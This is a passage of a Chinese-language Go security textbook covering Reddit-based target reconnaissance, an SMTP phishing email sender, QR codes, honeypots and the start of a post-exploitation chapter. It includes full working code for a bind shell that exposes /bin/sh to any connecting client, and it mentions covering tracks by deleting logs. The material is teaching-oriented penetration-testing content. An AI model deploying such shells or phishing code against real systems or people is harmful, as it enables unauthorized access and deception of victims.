阅读完本章后,你现在应该了解主机发现和枚举的基本概念。你应该能够在高层次上解释它们,并提供每个概念的基本示例。

首先,我们讨论了原始的 TCP 套接字,以一个简单的服务器和客户端为例。这些例子本身并不是非常有用,但它们是构建执行与服务的自定义交互的工具的模板。在尝试对未识别的服务进行指纹识别时,这将是有帮助的。

现在你应该知道如何运行一个简单的端口扫描,以及为什么你可能想要运行一个端口扫描。你应该了解如何使用 TCP 代理以及它提供了什么好处。你应该了解横幅抓取的工作原理以及为什么它是一种收集信息的有用方法。

还有许多其他形式的枚举。在 Web 应用程序中,你可以枚举用户名、用户 ID、电子邮件等。例如,如果一个网站使用 URL 格式www.example.com/user_profile/1234,你可以从数字 1 开始,逐渐增加 1,遍历网站上的每个用户资料。其他形式包括 SNMP、DNS、LDAP 和 SMB。

你还能想到哪些其他形式的枚举?如果你已经是一个权限较低的用户,你能想到什么样的枚举?一旦你拥有一个 shell,你会想收集关于服务器的什么样的信息?

一旦你在服务器上,你可以收集大量信息:用户名和组、主机名、网络设备信息、挂载的文件系统、正在运行的服务、iptables 设置、定时作业、启动服务等等。有关在已经访问到机器后该做什么的更多信息,请参阅第十三章,后期利用

在下一章中,我们将讨论社会工程学以及如何通过 JSON REST API 从 Web 上收集情报,发送钓鱼邮件和生成 QR 码。我们还将看到多个蜜罐的例子,包括 TCP 蜜罐和两种 HTTP 蜜罐的方法。

第十二章:社会工程

社会工程是指攻击者操纵或欺骗受害者执行某项行动或提供私人信息。这通常是通过冒充信任的人、制造紧急感或制造虚假前提来推动受害者采取行动。行动可能只是泄露信息,也可能更复杂,比如下载和执行恶意软件。

本章涵盖了蜜罐,尽管有时它们旨在欺骗机器人而不是人类。目标是故意欺骗,这是社会工程的核心。我们提供了基本的蜜罐示例,包括 TCP 和 HTTP 蜜罐。

本书未涵盖许多其他类型的社会工程。这包括物理或面对面的情况,例如尾随和假装是维护工作人员,以及其他数字和远程方法,例如电话呼叫、短信和社交媒体消息。

社会工程在法律上可能是一个灰色地带。例如,即使公司允许您对其员工进行社会工程,也不代表您有权钓取员工的个人电子邮件凭据。要意识到法律和道德的边界。

在本章中,我们将具体涵盖以下主题:

  • 使用 Reddit 的 JSON REST API 收集个人情报

  • 使用 SMTP 发送钓鱼邮件

  • 生成 QR 码和对图像进行 base64 编码

  • 蜜罐

通过 JSON REST API 收集情报

REST 与 JSON 正成为 Web API 的事实标准接口。每个 API 都不同,因此此示例的主要目标是展示如何从 REST 端点处理 JSON 数据。

此示例将以 Reddit 用户名作为参数,并打印该用户的最新帖子和评论,以了解他们讨论的话题。选择 Reddit 作为示例的原因是因为对于某些端点不需要进行身份验证,这样可以方便进行测试。其他提供 REST API 的服务,例如 Twitter 和 LinkedIn,也可以用于情报收集。

请记住,此示例的重点是提供从 REST 端点解析 JSON 的示例。由于每个 API 都不同,此示例应该作为参考,以便在编写自己的程序与 JSON API 交互时使用。必须定义一个数据结构以匹配 JSON 端点的响应。在此示例中,创建的数据结构与 Reddit 的响应匹配。

在 Go 中使用 JSON 时,首先需要定义数据结构,然后使用MarshalUnmarshal函数在原始字符串和结构化数据格式之间进行编码和解码。以下示例创建了一个与 Reddit 返回的 JSON 结构匹配的数据结构。然后使用Unmarshal函数将字符串转换为 Go 数据对象。您不必为 JSON 中的每个数据创建一个变量。您可以省略不需要的字段。

JSON 响应中的数据是嵌套的,因此我们将利用匿名结构。这样可以避免为每个嵌套级别创建单独的命名类型。此示例创建了一个命名结构,其中所有嵌套级别都存储为嵌入的匿名结构。

Go 数据结构中的变量名与 JSON 响应中提供的变量名不匹配,因此在定义结构时,JSON 变量名直接提供在数据类型之后。这样可以使变量正确地从 JSON 数据映射到 Go 结构。这通常是必要的,因为 Go 数据结构中的变量名是区分大小写的。

请注意,每个网络服务都有自己的服务条款,这可能会限制或限制您访问其网站的方式。一些网站有规定禁止抓取数据,其他网站有访问限制。虽然这可能不构成刑事犯罪,但服务可能会因违反服务条款而封锁您的账户或 IP 地址。请务必阅读您与之互动的每个网站或 API 的服务条款。

此示例的代码如下:

package main

import (
   "encoding/json"
   "fmt"
   "io/ioutil"
   "log"
   "net/http"
   "os"
   "time"
)

// Define the structure of the JSON response
// The json variable names are specified on
// the right since they do not match the
// struct variable names exactly
type redditUserJsonResponse struct {
   Data struct {
      Posts []struct { // Posts & comments
         Data struct {
            Subreddit  string  `json:"subreddit"`
            Title      string  `json:"link_title"`
            PostedTime float32 `json:"created_utc"`
            Body       string  `json:"body"`
         } `json:"data"`
      } `json:"children"`
   } `json:"data"`
}

func printUsage() {
   fmt.Println(os.Args[0] + ` - Print recent Reddit posts by a user

Usage: ` + os.Args[0] + ` <username>
Example: ` + os.Args[0] + ` nanodano
`)
}

func main() {
   if len(os.Args) != 2 {
      printUsage()
      os.Exit(1)
   }
   url := "https://www.reddit.com/user/" + os.Args[1] + ".json"

   // Make HTTP request and read response
   response, err := http.Get(url)
   if err != nil {
      log.Fatal("Error making HTTP request. ", err)
   }
   defer response.Body.Close()
   body, err := ioutil.ReadAll(response.Body)
   if err != nil {
      log.Fatal("Error reading HTTP response body. ", err)
   }

   // Decode response into data struct
   var redditUserInfo redditUserJsonResponse
   err = json.Unmarshal(body, &redditUserInfo)
   if err != nil {
      log.Fatal("Error parson JSON. ", err)
   }

   if len(redditUserInfo.Data.Posts) == 0 {
      fmt.Println("No posts found.")
      fmt.Printf("Response Body: %s\n", body)
   }

   // Iterate through all posts found
   for _, post := range redditUserInfo.Data.Posts {
      fmt.Println("Subreddit:", post.Data.Subreddit)
      fmt.Println("Title:", post.Data.Title)
      fmt.Println("Posted:", time.Unix(int64(post.Data.PostedTime), 
         0))
      fmt.Println("Body:", post.Data.Body)
      fmt.Println("========================================")
   }
} 

使用 SMTP 发送网络钓鱼电子邮件

网络钓鱼是攻击者试图通过伪装成可信任来源的合法电子邮件或其他形式的通信来获取敏感信息的过程。

网络钓鱼通常通过电子邮件进行,但也可以通过电话、社交媒体或短信进行。我们专注于电子邮件方法。网络钓鱼可以大规模进行,向大量收件人发送通用电子邮件,希望有人会上当。尼日利亚王子电子邮件诈骗是一种流行的网络钓鱼活动。其他提供激励的电子邮件也很受欢迎,并且相对有效,例如提供 iPhone 赠品或礼品卡,如果他们参与并按照您提供的链接登录其凭据。网络钓鱼电子邮件还经常模仿使用真实签名和公司标志的合法发件人。通常会制造紧急感,以说服受害者迅速采取行动,而不遵循标准程序。

您可以使用第十章中提取网页中的电子邮件的程序网络抓取来收集电子邮件。将电子邮件提取功能与提供的网络爬虫示例结合起来,您就可以强大地从域中抓取电子邮件。

鱼叉式网络钓鱼是针对少数目标的有针对性的网络钓鱼的术语,甚至可能只针对一个特定目标。鱼叉式网络钓鱼需要更多的研究和定位,定制特定于个人的电子邮件,创建一个可信的前提,也许是冒充他们认识的人。鱼叉式网络钓鱼需要更多的工作,但它增加了愚弄用户的可能性,并减少了被垃圾邮件过滤器抓住的机会。

在尝试鱼叉式网络钓鱼活动时,您应该在撰写电子邮件之前首先收集有关目标的尽可能多的信息。在本章的早些时候,我们谈到了使用 JSON REST API 来收集有关目标的数据。如果您的目标个人或组织有网站,您还可以使用第十章中的字数统计程序和标题抓取程序,网络抓取。收集网站的最常见单词和标题可能是快速了解目标所属行业或可能提供的产品和服务的方法。

Go 标准库附带了用于发送电子邮件的 SMTP 包。Go 还有一个net/mail包,用于解析电子邮件(golang.org/pkg/net/mail/)。mail包相对较小,本书未涵盖,但它允许您将电子邮件的完整文本解析为消息类型,从而让您单独提取正文和标题。此示例侧重于如何使用 SMTP 包发送电子邮件。

配置变量都在源代码的顶部定义。请确保设置正确的 SMTP 主机、端口、发件人和密码。常见的 SMTP 端口是25用于未加密访问,端口465587通常用于加密访问。所有设置都将取决于您的 SMTP 服务器的配置。如果没有首先设置正确的服务器和凭据,此示例将无法正确运行。如果您有 Gmail 帐户,您可以重用大部分预填充的值,只需替换发件人和密码。

如果您正在使用 Gmail 发送邮件并使用双因素身份验证,则需要在security.google.com/settings/security/apppasswords上创建一个应用程序专用密码。如果您不使用双因素身份验证,则可以在myaccount.google.com/lesssecureapps上启用不安全的应用程序。

该程序创建并发送了两封示例电子邮件,一封是文本,一封是 HTML。还可以发送组合的文本和 HTML 电子邮件,其中电子邮件客户端选择渲染哪个版本。这可以通过将Content-Type标头设置为multipart/alternative并设置一个边界来区分文本电子邮件的结束和 HTML 电子邮件的开始来实现。这里没有涵盖发送组合的文本和 HTML 电子邮件,但值得一提。您可以在www.w3.org/Protocols/rfc1341/7_2_Multipart.html上了解有关multipart内容类型的更多信息,RFC 1341

Go 还提供了一个template软件包,允许您创建一个带有变量占位符的模板文件,然后使用来自结构体的数据填充占位符。如果您想要将模板文件与源代码分开,以便在不重新编译应用程序的情况下修改模板,模板将非常有用。以下示例不使用模板,但您可以在golang.org/pkg/text/template/上阅读更多关于模板的信息:

package main

import (
   "log"
   "net/smtp"
   "strings"
)

var (
   smtpHost   = "smtp.gmail.com"
   smtpPort   = "587"
   sender     = "sender@gmail.com"
   password   = "SecretPassword"
   recipients = []string{
      "recipient1@example.com",
      "recipient2@example.com",
   }
   subject = "Subject Line"
)

func main() {
   auth := smtp.PlainAuth("", sender, password, smtpHost)

   textEmail := []byte(
      `To: ` + strings.Join(recipients, ", ") + `
Mime-Version: 1.0
Content-Type: text/plain; charset="UTF-8";
Subject: ` + subject + `

Hello,

This is a plain text email.
`)

   htmlEmail := []byte(
      `To: ` + strings.Join(recipients, ", ") + `
Mime-Version: 1.0
Content-Type: text/html; charset="UTF-8";
Subject: ` + subject + `

<html>
<h1>Hello</h1>
<hr />
<p>This is an <strong>HTML</strong> email.</p>
</html>
`)

   // Send text version of email
   err := smtp.SendMail(
      smtpHost+":"+smtpPort,
      auth,
      sender,
      recipients,
      textEmail,
   )
   if err != nil {
      log.Fatal(err)
   }

   // Send HTML version
   err = smtp.SendMail(
      smtpHost+":"+smtpPort,
      auth,
      sender,
      recipients,
      htmlEmail,
   )
   if err != nil {
      log.Fatal(err)
   }
}

生成 QR 码

快速响应QR)码是一种二维条形码。它存储的信息比传统的一维线条形码更多。它们最初是在日本汽车工业中开发的,但已被其他行业采用。QR 码于 2000 年被 ISO 批准为国际标准。最新规范可在www.iso.org/standard/62021.html上找到。

QR 码可以在一些广告牌、海报、传单和其他广告材料上找到。QR 码也经常用于交易中。您可能会在火车票上看到 QR 码,或者在发送和接收比特币等加密货币时看到 QR 码。一些身份验证服务,如双因素身份验证,利用 QR 码的便利性。

QR 码对社会工程学很有用,因为人类无法仅通过查看 QR 码来判断它是否恶意。往往 QR 码包含一个立即加载的 URL,使用户面临风险。如果您创建一个可信的借口,您可能会说服用户相信 QR 码。

此示例中使用的软件包称为go-qrcode,可在github.com/skip2/go-qrcode上找到。这是一个在 GitHub 上可用的第三方库,不受 Google 或 Go 团队支持。go-qrcode软件包利用了标准库图像软件包:imageimage/colorimage/png

使用以下命令安装go-qrcode软件包:

go get github.com/skip2/go-qrcode/...

go get中的省略号(...)是通配符。它还将安装所有子软件包。

根据软件包作者的说法,QR 码的最大容量取决于编码的内容和错误恢复级别。最大容量为 2953 字节,4296 个字母数字字符,7089 个数字,或者是它们的组合。

该程序演示了两个主要点。首先是如何生成原始 PNG 字节形式的 QR 码,然后将要嵌入 HTML 页面的数据进行 base64 编码。完整的 HTMLimg标签被生成,并作为标准输出输出,可以直接复制粘贴到 HTML 页面中。第二部分演示了如何简单地生成 QR 码并直接写入文件。

这个例子生成了一个 PNG 格式的二维码图片。让我们提供你想要编码的文本和输出文件名作为命令行参数,程序将输出将你的数据编码为 QR 图像的图片:

package main 

import (
   "encoding/base64"
   "fmt"
   "github.com/skip2/go-qrcode"
   "log"
   "os"
)

var (
   pngData        []byte
   imageSize      = 256 // Length and width in pixels
   err            error
   outputFilename string
   dataToEncode   string
)

// Check command line arguments. Print usage
// if expected arguments are not present
func checkArgs() {
   if len(os.Args) != 3 {
      fmt.Println(os.Args[0] + `

Generate a QR code. Outputs a PNG file in <outputFilename>.
Also outputs an HTML img tag with the image base64 encoded to STDOUT.

 Usage: ` + os.Args[0] + ` <outputFilename> <data>
 Example: ` + os.Args[0] + ` qrcode.png https://www.devdungeon.com`)
      os.Exit(1)
   }
   // Because these variables were above, at the package level
   // we don't have to return them. The same variables are
   // already accessible in the main() function
   outputFilename = os.Args[1]
   dataToEncode = os.Args[2]
}

func main() {
   checkArgs()

   // Generate raw binary data for PNG
   pngData, err = qrcode.Encode(dataToEncode, qrcode.Medium, 
      imageSize)
   if err != nil {
      log.Fatal("Error generating QR code. ", err)
   }

   // Encode the PNG data with base64 encoding
   encodedPngData := base64.StdEncoding.EncodeToString(pngData)

   // Output base64 encoded image as HTML image tag to STDOUT
   // This img tag can be embedded in an HTML page
   imgTag := "<img src=\"data:image/png;base64," + 
      encodedPngData + "\"/>"
   fmt.Println(imgTag) // For use in HTML

   // Generate and write to file with one function
   // This is a standalone function. It can be used by itself
   // without any of the above code
   err = qrcode.WriteFile(
      dataToEncode,
      qrcode.Medium,
      imageSize,
      outputFilename,
   )
   if err != nil {
      log.Fatal("Error generating QR code to file. ", err)
   }
} 

Base64 编码数据

在前面的例子中,QR 码是 base64 编码的。由于这是一个常见的任务,值得介绍如何进行编码和解码。任何时候需要将二进制数据存储或传输为字符串时,base64 编码都是有用的。

这个例子演示了编码和解码字节切片的一个非常简单的用例。进行 base64 编码和解码的两个重要函数是EncodeToString()DecodeString()

package main

import (
   "encoding/base64"
   "fmt"
   "log"
)

func main() {
   data := []byte("Test data")

   // Encode bytes to base64 encoded string.
   encodedString := base64.StdEncoding.EncodeToString(data)
   fmt.Printf("%s\n", encodedString)

   // Decode base64 encoded string to bytes.
   decodedData, err := base64.StdEncoding.DecodeString(encodedString)
   if err != nil {
      log.Fatal("Error decoding data. ", err)
   }
   fmt.Printf("%s\n", decodedData)
} 

蜜罐

蜜罐是你设置的用来捕捉攻击者的假服务。你故意设置一个服务,目的是引诱攻击者,让他们误以为这个服务是真实的,并包含某种敏感信息。通常,蜜罐被伪装成一个旧的、过时的、容易受攻击的服务器。日志记录或警报可以附加到蜜罐上,以快速识别潜在的攻击者。在你的内部网络上设置一个蜜罐可能会在任何系统被入侵之前警告你有攻击者的存在。

当攻击者攻击一台机器时,他们经常使用被攻击的机器来继续枚举、攻击和转移。如果你网络上的一个蜜罐检测到来自你网络上另一台机器的奇怪行为,比如端口扫描或登录尝试,那么表现奇怪的机器可能已经被攻击。

蜜罐有许多不同种类。它可以是从简单的 TCP 监听器,记录任何连接,到一个带有登录表单字段的假 HTML 页面,或者看起来像一个真实员工门户的完整的网络应用程序。如果攻击者认为他们已经找到了一个关键的应用程序,他们更有可能花时间试图获取访问权限。如果你设置有吸引力的蜜罐,你可能会让攻击者花费大部分时间在一个无用的蜜罐上。如果保留了详细的日志记录,你可以了解攻击者正在使用什么方法,他们有什么工具,甚至可能是他们的位置。

还有一些其他类型的蜜罐值得一提,但在这本书中没有进行演示:

  • SMTP 蜜罐:这模拟了一个开放的电子邮件中继,垃圾邮件发送者滥用它来捕捉试图使用你的邮件发送程序的垃圾邮件发送者。

  • 网络爬虫蜜罐:这些是不打算被人访问的隐藏网页,但是链接到它的链接被隐藏在你网站的公共位置,比如 HTML 注释中,用来捕捉蜘蛛、爬虫和网页抓取器。

  • 数据库蜜罐:这是一个带有详细日志记录以检测攻击者的假或真实数据库,可能还包含假数据以查看攻击者感兴趣的信息。

  • 蜜罐网络:这是一个充满蜜罐的整个网络,旨在看起来像一个真实的网络,甚至可以自动化或伪造客户端流量到蜜罐服务,以模拟真实用户。

攻击者可能能够发现明显的蜜罐服务并避开它们。我建议你选择两个极端之一:尽可能使蜜罐模仿一个真实的服务,或者使服务成为一个不向攻击者透露任何信息的完全黑匣子。

我们在这一部分涵盖了非常基本的例子,以帮助你理解蜜罐的概念,并为你提供一个创建自己更加定制化蜜罐的模板。首先,演示了一个基本的 TCP 套接字蜜罐。这将监听一个端口,并记录任何连接和接收到的数据。为了配合这个例子,提供了一个 TCP 测试工具。它的行为类似于 Netcat 的原始版本,允许你通过标准输入向服务器发送单个消息。这可以用来测试 TCP 蜜罐,或者扩展和用于其他应用程序。最后一个例子是一个 HTTP 蜜罐。它提供了一个登录表单,记录了尝试进行身份验证,但总是返回错误。

确保你了解在你的网络上使用蜜罐的风险。如果你让一个蜜罐持续运行而不保持底层操作系统的更新,你可能会给你的网络增加真正的风险。

TCP 蜜罐

我们将从一个 TCP 蜜罐开始。它将记录任何接收到的 TCP 连接和来自客户端的任何数据。

它将以身份验证失败的消息进行响应。由于它记录了来自客户端的任何数据,它将记录他们尝试进行身份验证的任何用户名和密码。你可以通过检查他们尝试的身份验证方法来了解他们的攻击方法,因为它就像一个黑匣子,不会给出任何关于它可能使用的身份验证机制的线索。你可以使用日志来查看他们是否将其视为 SMTP 服务器,这可能表明他们是垃圾邮件发送者,或者他们可能正在尝试与数据库进行身份验证,表明他们正在寻找信息。研究攻击者的行为可能非常有见地,甚至可以揭示你之前不知道的漏洞。攻击者可能会在蜜罐上使用服务指纹识别工具,你可能能够识别他们攻击方法中的模式,并找到阻止他们的方法。如果攻击者尝试使用真实的用户凭据登录,那么该用户很可能已经受到了威胁。

这个示例将记录高级请求,比如 HTTP 请求,以及低级连接,比如 TCP 端口扫描。TCP 连接扫描将被记录,但 TCP SYN(隐形)扫描将不会被检测到:

package main

import (
   "bytes"
   "log"
   "net"
)

func handleConnection(conn net.Conn) {
   log.Printf("Received connection from %s.\n", conn.RemoteAddr())
   buff := make([]byte, 1024)
   nbytes, err := conn.Read(buff)
   if err != nil {
      log.Println("Error reading from connection. ", err)
   }
   // Always reply with a fake auth failed message
   conn.Write([]byte("Authentication failed."))
   trimmedOutput := bytes.TrimRight(buff, "\x00")
   log.Printf("Read %d bytes from %s.\n%s\n",
      nbytes, conn.RemoteAddr(), trimmedOutput)
   conn.Close()
}

func main() {
   portNumber := "9001" // or os.Args[1]
   ln, err := net.Listen("tcp", "localhost:"+portNumber)
   if err != nil {
       log.Fatalf("Error listening on port %s.\n%s\n",
          portNumber, err.Error())
   }
   log.Printf("Listening on port %s.\n", portNumber)
   for {
      conn, err := ln.Accept()
      if err != nil {
         log.Println("Error accepting connection.", err)
      }
      go handleConnection(conn)
   }
}

TCP 测试工具

为了测试我们的 TCP 蜜罐,我们需要向它发送一些 TCP 流量。我们可以使用任何现有的网络工具,包括 Web 浏览器或 FTP 客户端来攻击蜜罐。一个很好的工具也是 Netcat,TCP/IP 瑞士军刀。不过,我们可以创建自己的简单克隆。它将简单地通过 TCP 读取和写入数据。输入和输出将分别通过标准输入和标准输出进行,允许你使用键盘和终端,或者通过文件和其他应用程序进行数据的输入或输出。

这个工具可以作为一个通用的网络测试工具使用,如果你有任何入侵检测系统或其他监控需要测试,它可能会有用。这个程序将从标准输入中获取数据并通过 TCP 连接发送它,然后读取服务器发送回来的任何数据并将其打印到标准输出。在运行这个示例时,你必须将主机和端口作为一个带有冒号分隔符的字符串传递,就像这样:localhost:9001。这是一个简单的 TCP 测试工具的代码:

package main

import (
   "bytes"
   "fmt"
   "log"
   "net"
   "os"
)

func checkArgs() string {
   if len(os.Args) != 2 {
      fmt.Println("Usage: " + os.Args[0] + " <targetAddress>")
      fmt.Println("Example: " + os.Args[0] + " localhost:9001")
      os.Exit(0)
   }
   return os.Args[1]
}

func main() {
   var err error
   targetAddress := checkArgs()
   conn, err := net.Dial("tcp", targetAddress)
   if err != nil {
      log.Fatal(err)
   }
   buf := make([]byte, 1024)

   _, err = os.Stdin.Read(buf)
   trimmedInput := bytes.TrimRight(buf, "\x00")
   log.Printf("%s\n", trimmedInput)

   _, writeErr := conn.Write(trimmedInput)
   if writeErr != nil {
      log.Fatal("Error sending data to remote host. ", writeErr)
   }

   _, readErr := conn.Read(buf)
   if readErr != nil {
      log.Fatal("Error when reading from remote host. ", readErr)
   }
   trimmedOutput := bytes.TrimRight(buf, "\x00")
   log.Printf("%s\n", trimmedOutput)
} 

HTTP POST 表单登录蜜罐

当你在网络上部署这个工具时,除非你是在进行有意的测试,任何表单提交都是一个红旗。这意味着有人试图登录到你的假服务器。由于没有合法的目的,只有攻击者才会有任何理由试图获取访问权限。这里不会有真正的身份验证或授权,只是一个幌子,让攻击者认为他们正在尝试登录。Go HTTP 包在 Go 1.6+中默认支持 HTTP 2。在golang.org/pkg/net/http/上阅读更多关于net/http包的信息。

以下程序将充当一个带有登录页面的 Web 服务器,只是将表单提交记录到标准输出。你可以运行这个服务器,然后尝试通过浏览器登录,登录尝试将被打印到终端上:

package main 

import (
   "fmt"
   "log"
   "net/http"
)

// Correctly formatted function declaration to satisfy the
// Go http.Handler interface. Any function that has the proper
// request/response parameters can be used to process an HTTP request.
// Inside the request struct we have access to the info about
// the HTTP request and the remote client.
func logRequest(response http.ResponseWriter, request *http.Request) {
   // Write output to file or just redirect output of this 
   // program to file
   log.Println(request.Method + " request from " +  
      request.RemoteAddr + ". " + request.RequestURI)
   // If POST not empty, log attempt.
   username := request.PostFormValue("username")
   password := request.PostFormValue("pass")
   if username != "" || password != "" {
      log.Println("Username: " + username)
      log.Println("Password: " + password)
   }

   fmt.Fprint(response, "<html><body>")
   fmt.Fprint(response, "<h1>Login</h1>")
   if request.Method == http.MethodPost {
      fmt.Fprint(response, "<p>Invalid credentials.</p>")
   }
   fmt.Fprint(response, "<form method=\"POST\">")
   fmt.Fprint(response, 
      "User:<input type=\"text\" name=\"username\"><br>")
   fmt.Fprint(response, 
      "Pass:<input type=\"password\" name=\"pass\"><br>")
   fmt.Fprint(response, "<input type=\"submit\"></form><br>")
   fmt.Fprint(response, "</body></html>")
}

func main() {
   // Tell the default server multiplexer to map the landing URL to
   // a function called logRequest
   http.HandleFunc("/", logRequest)

   // Kick off the listener using that will run forever
   err := http.ListenAndServe(":8080", nil)
   if err != nil {
      log.Fatal("Error starting listener. ", err)
   }
} 

HTTP 表单字段蜜罐

在上一个例子中,我们谈到了创建一个虚假的登录表单来检测有人尝试登录。如果我们想要确定是否是机器人呢?检测机器人尝试登录的能力也可以在生产网站上阻止机器人时派上用场。识别自动化机器人的一种方法是使用蜜罐表单字段。蜜罐表单字段是 HTML 表单上的输入字段,对用户隐藏,并且在表单被人类提交时预期为空白。机器人仍然会在表单中找到蜜罐字段并尝试填写它们。

目标是欺骗机器人,让它们认为表单字段是真实的,同时对用户隐藏。一些机器人会使用正则表达式来寻找关键词,比如useremail,并只填写这些字段;因此蜜罐字段通常使用名称,比如email_addressuser_name,看起来像一个正常的字段。如果服务器在这些字段接收到数据,它可以假设表单是由机器人提交的。

如果我们在上一个例子中的登录表单中添加一个名为email的隐藏表单字段,机器人可能会尝试填写它,而人类则看不到它。表单字段可以使用 CSS 或input元素上的hidden属性来隐藏。我建议您使用位于单独样式表中的 CSS 来隐藏蜜罐表单字段,因为机器人可以轻松确定表单字段是否具有hidden属性,但要更难检测到输入是否使用样式表隐藏。

沙盒

一个相关的技术,本章没有演示,但值得一提的是沙盒。沙盒的目的与蜜罐不同,但它们都努力创建一个看起来合法的环境,实际上是严格受控和监视的。沙盒的一个例子是创建一个没有网络连接的虚拟机,记录所有文件更改和尝试的网络连接,以查看是否发生了可疑事件。

有时,沙盒环境可以通过查看 CPU 数量和内存来检测。如果恶意应用程序检测到资源较少的系统,比如 1 个 CPU 和 1GB 内存,那么它可能不是现代桌面机器,可能是一个沙盒。恶意软件作者已经学会了对沙盒环境进行指纹识别,并编程应用程序,以绕过任何恶意操作,如果它怀疑自己在沙盒中运行。

总结

阅读完本章后,您现在应该了解社会工程的一般概念,并能够提供一些例子。您应该了解如何使用 JSON 与 REST API 交互,生成 QR 码和 base64 编码数据,以及使用 SMTP 发送电子邮件。您还应该能够解释蜜罐的概念,并了解如何实现自己的蜜罐或扩展这些例子以满足自己的需求。

你还能想到哪些其他类型的蜜罐?哪些常见服务经常受到暴力破解或攻击?你如何定制或扩展社会工程的例子?你能想到其他可以用于信息收集的服务吗?

在下一章中,我们将涵盖后期利用的主题,比如部署绑定 shell、反向绑定 shell 或 Web shell;交叉编译;查找可写文件;以及修改文件时间戳、权限和所有权。

第十三章:后渗透

后渗透指的是渗透测试的阶段,其中一台机器已经被利用并且可以执行代码。主要任务通常是保持持久性,以便您可以保持连接活动或留下重新连接的方式。本章涵盖了一些常见的持久性技术;即绑定 shell、反向绑定 shell 和 Web shell。我们还将研究交叉编译,在从单个主机编译不同操作系统的 shell 时非常有帮助。

后渗透阶段的其他目标包括查找敏感数据,对文件进行更改,并隐藏您的踪迹,以便取证调查人员无法找到证据。您可以通过更改文件的时间戳、修改权限、禁用 shell 历史记录和删除日志来掩盖您的踪迹。本章涵盖了一些查找有趣文件和掩盖踪迹的技术。

第四章,取证,与本章密切相关,因为进行取证调查与探索新被利用的机器并无太大不同。两项任务都是关于了解系统上有什么并找到有趣的文件。同样,第五章,数据包捕获和注入,对于从被利用的主机进行网络分析非常有用。在这个阶段,诸如查找大文件或查找最近修改的文件等工具也非常有用。请参考第四章,取证,和第五章,数据包捕获和注入,以获取更多可在后渗透阶段使用的示例。

后渗透阶段涵盖了各种任务,包括提权、枢纽、窃取或销毁数据,以及主机和网络分析。由于范围如此广泛,并且根据您所利用的系统类型而变化,本章重点关注应该在大多数情况下有用的一系列主题。

在进行这些练习时,尝试从攻击者的角度看待事物。在处理示例时采用这种心态将有助于您了解如何更好地保护您的系统。

在这一章中,我们将涵盖以下主题:

  • 交叉编译

  • 绑定 shell

  • 反向绑定 shell

  • Web shell

  • 查找具有写权限的文件

  • 修改文件时间戳

  • 修改文件权限

  • 修改文件所有权

交叉编译

交叉编译是 Go 提供的一个非常易于使用的功能。如果您正在 Linux 机器上执行渗透测试,并且需要编译一个在您已经攻陷的 Windows 机器上运行的自定义反向 shell,这将非常有用。

您可以针对多种架构和操作系统,而您需要做的只是修改一个环境变量。无需任何额外的工具或编译器。Go 中已经内置了一切。

只需更改GOARCHGOOS环境变量以匹配您所需的构建目标。您可以构建 Windows、Mac、Linux 等系统。您还可以为主流的 32 位和 64 位桌面处理器以及树莓派等设备的 ARM 和 MIPS 构建。

截至目前,GOARCH的可能值如下:

386 amd64
amd64p32 arm
armbe arm64
arm64be ppc64
ppc64le mips
mipsle mips64
mips64le mips64p32
mips64p32le ppc
s390 s390x
sparc sparc64

GOOS的选项如下:

android darwin
dragonfly freebsd
linux nacl
netbsd openbsd
plan9 solaris
windows zos

请注意,并非每种架构都可以与每种操作系统一起使用。请参考 Go 官方文档(golang.org/doc/install/source#environment),了解可以组合哪些架构和操作系统。

如果你的目标是 ARM 平台,你可以通过设置GOARM环境变量来指定 ARM 版本。系统会自动选择一个合理的默认值,建议你不要更改。在撰写本文时,可能的GOARM值为567

在 Windows 中,在命令提示符中设置环境变量,如下所示:

Set GOOS=linux
Set GOARCH=amd64
go build myapp

在 Linux/Mac 中,你也可以以多种方式设置环境变量,但你可以像这样为单个构建命令指定它:

GOOS=windows GOARCH=amd64 go build mypackage  

golang.org/doc/install/source#environment了解更多关于环境变量和交叉编译的内容。

这种交叉编译方法是在 Go 1.5 中引入的。在那之前,Go 开发人员提供了一个 shell 脚本,但现在不再支持,它被存档在github.com/davecheney/golang-crosscompile/tree/archive

创建绑定 shell

绑定 shell 是绑定到端口并监听连接并提供 shell 的程序。每当收到连接时,它运行一个 shell,比如 Bash,并将标准输入、输出和错误处理传递给远程连接。它可以永久监听并为多个传入连接提供 shell。

绑定 shell 在你想要为机器添加持久访问时非常有用。你可以运行绑定 shell,然后断开连接,或者通过远程代码执行漏洞将绑定 shell 注入内存。

绑定 shell 的最大问题是防火墙和 NAT 路由可能会阻止直接远程访问计算机。传入连接通常会被阻止或以一种阻止连接到绑定 shell 的方式路由。因此,通常使用反向绑定 shell。下一节将介绍反向绑定 shell。

在 Windows 上编译这个示例,结果为 1,186 字节。考虑到一些用 C/Assembly 编写的 shell 可能不到 100 字节,这可能被认为是相对较大的。如果你要利用一个应用程序,你可能只有非常有限的空间来注入绑定 shell。你可以通过省略log包、删除可选的命令行参数和忽略错误来使示例更小。

可以使用 TLS 来替代明文,方法是用tls.Listen()替换net.Listen()。第六章,密码学,有一个 TLS 客户端和服务器的示例。

接口是 Go 语言的一个强大特性,这里通过读取器和写入器接口展示了它的便利性。满足读取器和写入器接口的唯一要求是分别为该类型实现.Read().Write()函数。在这里,网络连接实现了Read()Write()函数,exec.Command也是如此。由于它们实现的共享接口,我们可以轻松地将读取器和写入器接口绑定在一起。

在下一个示例中,我们将看看如何为 Linux 创建一个使用内置的/bin/sh shell 的绑定 shell。它将绑定并监听连接,为任何连接提供 shell:

// Call back to a remote server and open a shell session
package main

import (
   "fmt"
   "log"
   "net"
   "os"
   "os/exec"
)

var shell = "/bin/sh"

func main() {
   // Handle command line arguments
   if len(os.Args) != 2 {
      fmt.Println("Usage: " + os.Args[0] + " <bindAddress>")
      fmt.Println("Example: " + os.Args[0] + " 0.0.0.0:9999")
      os.Exit(1)
   }

   // Bind socket
   listener, err := net.Listen("tcp", os.Args[1])
   if err != nil {
      log.Fatal("Error connecting. ", err)
   }
   log.Println("Now listening for connections.")

   // Listen and serve shells forever
   for {
      conn, err := listener.Accept()
      if err != nil {
         log.Println("Error accepting connection. ", err)
      }
      go handleConnection(conn)
   }

}

// This function gets executed in a thread for each incoming connection
func handleConnection(conn net.Conn) {
   log.Printf("Connection received from %s. Opening shell.", 
   conn.RemoteAddr())
   conn.Write([]byte("Connection established. Opening shell.\n"))

   // Use the reader/writer interface to connect the pipes
   command := exec.Command(shell)
   command.Stdin = conn
   command.Stdout = conn
   command.Stderr = conn
   command.Run()

   log.Printf("Shell ended for %s", conn.RemoteAddr())
} 

创建反向绑定 shell

